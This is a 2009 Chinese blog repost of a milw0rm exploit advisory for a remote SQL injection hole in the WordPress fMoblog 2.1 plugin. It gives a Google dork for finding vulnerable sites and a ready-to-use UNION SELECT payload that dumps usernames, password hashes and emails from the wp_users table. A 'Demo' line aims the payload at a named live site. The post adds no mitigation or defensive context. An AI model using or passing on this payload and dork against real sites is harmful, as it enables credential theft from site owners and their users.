男人就应该对自己狠一点... 注册 | 登陆

Wordprss插件Sql注入漏洞

Submitted by 老臧 on 2009, March 18, 8:40 AM. 技术文章 相关文章 评论

#############################################################
# Wordpress Plugin fMoblog Remote SQL Injection Vulnerability
# Plugin Home: http://www.fahlstad.se/wp-plugins/fmoblog/
# Plugin Version: 2.1
# Author: strange kevin
# Email: strange.kevin@gmail.com
# Google Dork: "Gallery powered by fMoblog"
##############################################################

# Exploit: http://www.site.com/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--
# Demo: http://www.tarynitup.com/?page_id=20&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--

##############################################################
# Greetz: str0ke and milw0rm.com
##############################################################

# milw0rm.com [2009-03-17]

图片附件:
大小: 2.67 K 尺寸: 150 x 31 浏览: 0 次 点击打开新窗口浏览全图

Tags: wordpress, sql, injection

只显示20条记录相关文章

将SQL SERVER数据库导出为TXT (浏览: 2158, 评论: 3)
SQL实现查询时插入数据库 (浏览: 1028, 评论: 0)
Ubuntu上建立WordPress环境 (浏览: 1135, 评论: 0)
看到两个很不错的国外黑客教程放一下 (浏览: 1143, 评论: 0)
防止SQL注入 (浏览: 952, 评论: 0)

Trackbacks

点击获得Trackback地址,Encode: UTF-8 老臧's blog

发表评论

评论内容 (必填):